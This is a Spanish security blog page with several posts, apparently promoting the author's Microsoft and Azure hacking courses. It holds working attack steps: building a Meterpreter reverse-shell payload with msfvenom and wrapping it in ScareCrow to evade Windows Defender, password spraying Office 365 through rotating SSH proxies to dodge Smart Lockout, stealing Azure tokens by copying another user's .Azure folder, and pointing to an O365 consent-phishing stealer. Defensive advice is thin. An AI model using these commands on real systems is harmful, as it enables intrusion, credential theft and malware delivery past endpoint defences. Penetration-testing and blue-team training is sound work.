EDR o no EDR, esa es la cuestión: Bypass Defender con ScareCrow

 Estimados amigos de Inseguros !!!

Dentro de las fases que acometen los malos es el de saltarse las medidas defensivas. Y como tal, son ejercicios que debemos de hacer en nuestras organizaciones para saber como se compartan el resto de medida.

En esta ocasión vamos a lanzar una shell Meterpreter contra un Windows parcheado y con Defender y ver como no se entera. Lo vamos a hacer con la herramienta ScareCrow.

Esta herramienta es muy interesante porque firma el binario con la clave pública del dominio https que le digamos, parchear AMIS, ETW y hacer una seria de bypass EDR con la manera que tiene que cargar el código en memoria, para detectar lo que está hookeando el EDR y cargárselo. Si quieres bajar a cómo lo hace, hay dos post muy interesantes. Post 1 y Post 2 donde explica los hooks y las syscall que hace.

El proceso de instalación es muy sencillo.

Se clona el repositorio, se instalan dependencias

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
go get github.com/Binject/debug/pe
go get github.com/awgh/rawreader

Se comprueba que existen estos paquetes y sino, ya sabes...

openssl
osslsigncode
mingw-w64

Y se compila:

go build ScareCrow.go

Ahora vamos a generar nuestra shell, por ejemplo con meterpreter. Generamos una shell con msfvenemom y ponemos a escuchar.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.50 LPORT=12345 -f raw -o fud.bin 

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 

msf6 exploit(multi/handler) > set lport 12345 

msf6 exploit(multi/handler) > set lhost 192.168.100.50 msf6 exploit(multi/handler) > run 

Ahora tomamos la shell y se la pasamos a la herramienta

./ScareCrow -I fud.bin -domain www.microsoft.com -encryptionmode AES 

Ejecutamos en un Windows con Defender y listo. Si te no va a la primera, prueba a compilar otro binario, a la segunda va.

Como puedes adivinar, confiar toda nuestra defensa en una sola línea de defensa es un error. 

Por ejemplo, en mi caso podría haber hecho varias cosas. Podríamos haber bloqueado la ip de origen del equipo que compartido el binario que me ha pillado la primera vez. Podría haber detectado tráfico http entre equipos de una lan que apriori no deberían. Hay muchas maneras de intentar monitorizar lo que pasa es nuestros entornos y así poder luchar contra ataques de este tipo.

Para ello, lo mejor es conocer nuestros sistemas en profundidad y para eso tienes el mejor curso de experto en Ciberseguridad Microsoft del momento. SI. Mejor que muchos "en inglés" muy famososos que te enseñan 4 cosas. 

Si estás trabajando, píde los créditos de formación que tienes disponibles y vamos a pasar 3 meses entretenidos aprendiendo muy mucho Ciberseguridad. 

Si necesitas más información, en la web puedes pedir una cita y charlamos.

Gracias por leerme !!!

Fuerza Bruta contra O365 mediante proxy para evadir bloqueos:Trevor

 Estimados amigos de Inseguros!!!

Un de las primeras cosas que debemos mirar a la hora de auditar nuestras infraestructuras es la calidad de las contraseñas, de nuestros empleados o clientes. Realizar una campaña de fuerza bruta con algunas passwords conocidas, relacionadas con el negocio, no me parece una mala idea.

Existen distintas aplicaciones con las que podemos acometer esta misión, pero Azure implementa un mecanismo denominado Smart Lockout que va a detectar los intentos de inicio de sesión fallidos y nos va a bloquear. 

Teniendo como objetivo saltarnos esta medida, vamos a usar algo ya conocido, y es el uso de proxys para repartir las peticiones y así hacer más dificíl a los sistemas defensivos la detección.

Lo vamos a realizar con la herramienta TrevorSpray.  Lo que me gusta de este proyecto es que el autor ha publicado aparte el componente proxy, por lo que mediante proxychains, como hacemos con TOR, podemos usar los nodos para tirar cualquier comando, pero vamos a centrarnos en la fuerza bruta...

Las instrucciones son muy sencillas:

pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

 export PATH=$PATH:/home/kinomakino/.local/bin

Como con cualquier otra herramienta, le damos un vistazo a las opciones. Me gusta indicar que no haga intentos de bypass del MFA, ya que podría generar mucho ruido. En esta fase nos centramos en obtener credenciales válidas, ya veremos luego como las explotamos.

Un comando sencillo podría ser: trevorspray -u lista_de_usuarios -p 'Password' -nl 

Ahora bien, tiramos la herramienta, y lo que suele pasar es que los filtros Smart Lockout nos cazen y empiece a decirnos que las cuentas están bloqueadas

Ahora es donde metemos la magia y le indicamos que queremos "canalizar" el ataque en uno o más ssh y voila !!!

 trevorspray -u trevor-users2.txt -p 'cosas' 'cosas2' 'cosas3' 'cosas4' -nl --ssh kinomakino@40.77.175.84 kinomakino@51.1.106.102 kinomakino@20.1.198.6 kinomakino@20.4.128.167 --jitter 15 

Desde el punto de vista defensivo, podemos configurar este comportamiento solo si tenemos P1. Si no lo tenemos, funcionará el lockout, pero no podemos configurar valores personalizados.

También sería interesante monitorizar estos log, por ejemplo, desde el visor de inicios de sesión desde Entra ID 

El problema de esta información es que no es "accionable". No podemos vincularle acciones, como haríamos con un SIEM. Pero para eso también tenemos este post donde te enseño a guardar estos registros en Log Analytics y asociarle reglas de ejecución.

Todas estas cosas las puedes encontrar si te animas a realizar el cuso de Hacking y Defensa de Azure y O365. 

Quedan pocas plazas. Quieres que te cuente en una reunión cositas sobre el curso?  

Gracias por leerme !!!

Ataques contra Azure: Tu programador: Robo de tokens

 Estimados amigos de Inseguros !!!

Cuando hablamos de la seguridad empresarial, son muchos los frentes que se nos presentan. El conocido perímetro, el endpoint, el no-perimetro, la cadena de suministros, los ataques de día cero, el correo, etc etc etc.

Muchas veces el enemigo lo tenemos en casa, y no me refiero a Juan que lo acepta todo, o a Pepa que es experta en descubrir como romper el ERP. No, me refiero incluso a nosotros mismos. 

En este caso voy a hablar del "programador". Ese enemigo del administrador de sistemas 😉😉😉 que quiere tener Root en todos los servers. Noooo, eso ya paso verdad? xD ahora tenemos DEVOPS !!! somos Trending !!! tenemos un repo. de versiones y Jenkins !!! bien, vale. Pero no me refiero a esto. 

Estoy poniendo el caso del programador, pero podría ser otro, permitirme la broma.

A lo que voy, programador que tiene en su portátil acceso a Azure, a "equis" cosas. Puede ser acceso a máquinas virtuales, al key vault de secretos, a una aplicación en concretro, al repositorio de código, a lo que sea, pero tiene algo. Ese algo puede ser la "cocina de la empresa", es decir, acceder a todos los datos, o hacerme con el dominio, o puede ser un paso intermedio hacia otro objetivo que si que me de el ansiado Administrador...

Bien, una vez tenemos el peligro, vamos a pensar. Sabemos que es un modelo de TIERS, es decir, tenemos varias zonas en nuestra empresa, y no usamos el portátil que usamos para navegar, para conectarnos al DC, TAMPOCO usamos el mismo equipo, usamos un host bastion. Bien, y el PC del programador donde lo ponemos? es un Tier 0 ? Es un Tier intermedio con procesos de desarrollo, o es un Tier 2 de un usuario?

Tenemos MFA local al equipo? tenemos cifrado de disco? no lo se cari, dímelo tu !!! este equipo, es portátil? se lo lleva de finde.?

Se está mascando la tragedia. Tenemos un usario con privilegios en nuestra infraestructura, quizás no en el dominio, pero si en Azure, y no lo estamos protegiendo como un servidor "delicado de la muerte" con mil políticas de hardening. 

Ahora que sabemos que es un objetivo goloso, y parece que es fáci, vamos a imaginar un ataque complicado, rebuscado !!!Hazlo tu mismo, entre en C:\Users\kinomakino\  y busca la carpeta .Azure hazlo con el tuyo !!!

Ahora copia esta carpeta y pégasela a otro usuario. Entra en Azure y "voila" has usado el token del compañero para autenticarse. MIRA QUE COMPLEJO !!! 

Claro !!! para que pase esto, hay que hacerse con el admin. local de la máquina, o con el admin del dominio, o con acceso físico, SIIIIIII, si aquí nadie regala nada. Pero igual que protegemos a los servers en profundidad, con las medidas que he comentado antes, este equipo debería tener esa protección extra.

En este caso, partimos de un entorno en el que hemos hackeado el Active Directory, pero queremos saltar al cloud. En otras ocasiones, es al revés, hemos accediro a Azure y tal...

Estas cosas no se arreglan haciendo "clicks" en uno o dos sitios, se arreglan arquitectando bien los servicios, conociendo como funcionan, qué posibilidades nos dan de fortificación, y sobre todo, sabiendo qué hacen los malos, para ir poniendo medidas.

Estas cosas no salen en la web de Microsoft. Si buscas libros, certificaciones y demás, veras los "sc-100, 200" y cosas así, que te enseñan a hacer configuraciones de seguridad, pero si quieres aprender CIberseguridad Azure y O365, tienes que hacer mi curso. Así, directo, sin vaselina. Estas formaciones o las obtienes así, o cuesta MUCHO que tus chicos las aprendan.

formacion.seguridadsi.com

No esperes más. No te quedes atrás y da el salto hacia la seguridad Cloud.

Seas sysadmin, administrador de red, blue team,  pentester, sea lo que sea, piensa en hacia donde quieres llegar, y confía en Seguridadsi.

Si tienes alguna duda, y quieres saber más de los cursos, tienes la web. Puedes contactar conmigo para una charla de 15 minutos y resolver todas las dudas.

Ah, se me olvida, si trabajas en España se puede bonificar.

Gracias como siempre !!!

¿Cómo auditar tu entorno Active Directory tu mismo? Prepárate que vienen curvas

 Estimados amigos de Inseguros !!!

Seguramente si me sigues, habrás estudiado bastante ciberseguridad, Windows, Azure, y cosas por el estilo.

En este humilde blog he ido escribiendo, y sigo haciéndolo, consejos, procesos, herramientas, ideas, tutoriales, opiniones, sobre la ciberseguridad, y muchas veces, desde la perspectiva Microsoft.

Muchos de vosotros habéis asistido a algún Webinar gratuito, o habés descargado alguno de los ebooks, como Buscadores, laboratorios o controles recomendables. *sabes que si haces los webinars grabados en la academia te llevas tu diploma acreditativo gratis?*

El otro día sacamos una auto-evaluación de 5 preguntas, para que reflexiones sobre varios aspectos de salud de tu AD, que te invito a que hagas.

Pero, muchos de vosotos me habéis transmitido de que os falta quizás el hilo conductor.

Que hemos aprendido muchas cosas, una cosita de aquí, otra de allá, pero os falta esa visión global de cómo acometer un plan de ciberseguridad para vuestras redes.

Creo que tiene todo el sentido del mundo. Yo mismo soy de los que opinan que no es tan necesario conocer la herramienta Equis o Zeta, sino conocer los procesos, los Attack Path que emplean los malos.

Academia SeguridadSI

Como todos sabéis, hace unos meses que llevo el proyecto de la academia. Si no la conoces, te invito a que te bajes el Dossier de presentación !!!!

Para el entorno Cloud, tenemos un curso MUY potente de ataque y defensa a Azure y O365, disponible para que lo hagas con nosotros. *SEPTIEMBRE*

Para el entorno Microsoft en general, tenemos el "Master". El curso Especialista en entornos Microsoft de 3 meses. En el no solo aprendes teoría y práctica, defensiva, sino ofensiva, aprenderás a atacarte, a defenderte, a usar el cloud ( incluye el contenido del curso de Azure y O365) pero desde el punto de vista de las trincheras, del sysadmin real, del CIO que debe tomar las mejores decisiones conociendo las amenazas. NO desde el punto de vista de "haz click aquí" haz "click allá" y compra "esto" o "lo otro".

Próximamente

PERO, aún así, creemos que muchos de vosotros os gusta la sangre !!! que si, que conocer Kerberos está muy bien, pero los ataques que enseñamos están ya más visto que el TBO. SI !!!! que veamos un Kerberoasting o un "Responder" no es tanto para conocer el ataque en sí, sino para conocer a bajo nivel como funciona Kerberos por un lado, y SMB/NTLM por el otro.

PERO como digo, para todos vosotros que os dedicais día a día al hacking ético, al pentesting. O para los sysadmin que queréis comenzar en ciberseguridad ofensiva, vamos a sacar el curso, el Mega curso, EL MEJOR CURSO DE HACKING orientado a Microsoft del mercado.

Está a punto de salir. Será un curso, que siguiendo las distintas fases de un ataque: Acceso inicial, movimientos laterales, evasión de defensas, etc Aprenderemos numerosas herramientas y procesos.

Seremos capaces de auditar nuestra organización, o la de cualquier cliente.

NO SERÁ el típico curso de Hacking Ético desactualizado que veo, por ejemplo:

• Mitad del temario, manejo de linux.
• Temar concretos de "elevación de privilegios" en Linux, al estilo OSCP.
• Top Ten Owasp.
• Un curso para aprender "fase de descubrimiento" con Nmap.
• Que aparezca la palabra OSINT
• Bash Scripting...
• Docker...

HUYE DE ESTOS "creadores de contenido". NO TRABAJAN EN ESTO

NO, ese curso está CADUCADO. Esos cursos están bien para dedicarse al hacking en general, pero el curso que vamos a sacar es un curso para usar en EMPRESAS REALES. 

Muchos de vosotros seguramente no hagáis nunca un CTF, ni tan siquiera os dediquéis a la ciberseguridad, estos cursos suelen ser de poco nivel técnico, muchas teclas que caducan enseguida, y que no aportan NADA a tu empresa.

Las empresas reales tienen ACTIVE DIRECTORY y O365. No todas... ya lo se, pero SI la mayoría.

Cansado de ver malas formaciones, estoy FOCALIZADO en esta tarea, en crear el MEJOR CURSO PRÁCTICO de Hacking Microsoft, y está a punto de salir.

He pensado subirlo grabado. Por cada Fase, equis procedimientos/herramientas. Así cada uno puede seguir el curso de la manera que más le convenga. Si quiere hacer un proceso de cada fase, o por si lo contrario quiere hacer todos los procesos de "Acceso Inicial".... como el alumno quiera.

Cuando se publique me temo que verás algo de publicidad :-) pero estate preparado, porque viene un final de año cargado de acciones, de pago y gratuitas para todos los amigos de la comunidad que tanto apoyo me regaláis. 

Por si acaso, si quieres estar al tanto de las novedades, descuentos y estas cosas, te invito a que te suscribas.

Gracias por todo !!!

Permisos sobre aplicaciones de terceros en Azure: Cómo robar tu token con un phishing.365 Stealer

 Estimados amigos de Inseguros !!!

En el episodio de hoy, vamos a recrear un ataque muy habitual en configuraciones de Azure no bien hechas y es el robo de token mediante permisos a aplicaciones.

El concepto es muy sencillo. Un atacante registra una aplicación maliciosa en SU tenant. Nos invita a nosotros, pero nos pide permisos en NUESTRO tenant. Si no hemos configurado bien este aspecto en nuestro tenant, nuestros usuarios pueden caer facilmente. 

Vamos a utilizar la herramienta O365 Stealer.

El enlace del proyecto utilizado es el este y mejor que un texto, os paso el video de una de las clases donde se muestra por encima el proceso.

https://youtu.be/xyDeW9BSMH8

Y como siempre, si te gusta este contenido, puedes mirar los dos cursos que hemos sacado para Septiembre y final de año. Toda la información disponible en https://formacion.seguridadsi.com/

Gracias  !!!